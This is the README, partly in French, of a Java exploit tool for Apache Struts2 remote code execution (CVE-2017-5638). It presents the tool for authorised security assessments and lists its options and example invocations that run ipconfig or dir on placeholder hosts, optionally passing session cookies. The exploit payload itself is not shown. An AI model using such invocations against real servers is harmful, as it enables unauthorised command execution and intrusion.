
Exploit basé sur Java pour Apache Struts2 CVE-2017-5638, exécutant des commandes arbitraires via des en-têtes HTTP spécialement conçus. Destiné aux évaluations de sécurité autorisées.
Il s'agit d'une sorte de portage Java de l'exploit Python disponible à l'adresse : https://www.exploit-db.com/exploits/41570/.
Ce logiciel est écrit sans dépendances externes.
Cet outil est destiné aux ingénieurs sécurité et aux professionnels de la sécurité applicative (AppSec) pour des évaluations de sécurité. Veuillez utiliser cet outil de manière responsable. Je n'assume aucune responsabilité quant à la manière dont cet outil est utilisé. Je ne suis PAS responsable des dommages causés ou des crimes commis en utilisant cet outil.
Usage:
java -jar struts2_cve-2017-5638.jar [options]
Description:
Exploiting Apache Struts2 Remote Code Execution (CVE-2017-5638).
Options:
-h, --help
Prints this help and exits.
-u, --url [target_URL]
The target URL where the exploit will be performed.
-cmd, --command [command_to_execute]
The command that will be executed on the remote machine.
--cookies [cookies]
Optional. Cookies passed into the request, i.e. authentication cookies.
-v, --verbose
Optional. Increase verbosity.
java -jar struts2_cve-2017-5638.jar --url "https://vuln1.foo.com/asd" --command ipconfig
java -jar struts2_cve-2017-5638.jar --url "https://vuln2.foo.com/asd" --command ipconfig --cookies "JSESSIONID=qwerty0123456789"
java -jar struts2_cve-2017-5638.jar --url "https://vuln3.foo.com/asd" --command dir --cookies "JSESSIONID=qwerty0123456789;foo=bar"
Ce projet est sous licence MIT - voir le fichier LICENSE.txt pour plus de détails.